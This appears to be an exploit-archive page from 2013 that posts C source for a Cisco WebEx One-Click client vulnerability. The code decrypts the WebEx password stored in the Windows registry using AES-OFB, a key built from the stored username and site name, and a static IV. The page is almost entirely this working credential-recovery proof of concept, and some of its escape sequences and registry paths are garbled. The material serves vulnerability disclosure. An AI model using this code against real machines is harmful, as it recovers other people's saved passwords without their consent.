Home / exploitsPDF  

Cisco WebEx One-Click Client Password Encryption Information Vulnerability

Posted on 18 August 2013

<pre>#include &lt;openssl/aes.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
 
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
        unsigned char * outbuf = calloc(1,length);
        int num = 0;
 
        unsigned char liv[16];
 
        memcpy(liv,iv,16);
 
        AES_KEY aeskey;
 
        //memset(outbuf, 0, 8);
 
        AES_set_encrypt_key(key, 256, &amp;aeskey);
 
        AES_ofb128_encrypt(text, outbuf, length, &amp;aeskey, liv, &amp;num);
 
        return outbuf;
}
 
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
        unsigned char * outbuf= calloc(1,length);
        int num = 0;
 
        unsigned char liv[16];
 
        memcpy(liv,iv,16);
 
        AES_KEY aeskey;
 
 
        AES_set_encrypt_key(key, 256, &amp;aeskey);
 
        AES_ofb128_encrypt(enc, outbuf, length, &amp;aeskey, liv, &amp;num);
 
        return outbuf;
}
void main() {
    /*
        This value is from
            HKEY_CURRENT_USERSoftwareWebExProdToolsPassword
    */
    unsigned char * regVal = &quot;xccx6dxc9x3bxa0xccx4cx76x55xc9x3bx9f&quot;;
    /*
        This value is from
            HKEY_CURRENT_USERSoftwareWebExProdToolsPasswordLen
    */
    int regLength = 12;
 
    /*
        This value is a combination of these two registry keys:
            HKEY_CURRENT_USERSoftwareWebExProdToolsUserName
            HKEY_CURRENT_USERSoftwareWebExProdToolsSiteName
 
        Basicaly the username and the sitename padding to 32 characters, if the
        two dont add up to 32 characters, its just repeated until it fits
    */
    unsigned char key[32] = &quot;braantonsiteaa.webex.com/siteaab&quot;;
 
    /*
        The IV is static, particularly complex value of 123456789abcdef....
    */
    unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
 
    /*
        These are just for testing, you'd probably not have the password :)
    */
    unsigned char * password = &quot;bradbradbrad&quot;;
    int pwLength = strlen((char *)password);
 
    unsigned char * enc = NULL;
    unsigned char * enc2 = NULL;
    int i = 0;
 
     
    printf(&quot;Reg Key Value = &quot;);
    enc = aes_ofb_encrypt(password, pwLength, key, iv);
    for(i=0;i&lt;pwLength;i++) {
        printf(&quot;%02x &quot;, enc[i]);
    }
    printf(&quot;
&quot;);
 
    printf(&quot;Password = &quot;);
    enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
    for(i=0;i&lt;regLength;i++) {
        printf(&quot;%c&quot;, enc2[i]);
    }
    printf(&quot;
&quot;);   
    
 
}
</pre>

 

TOP

Malware :

Exploits :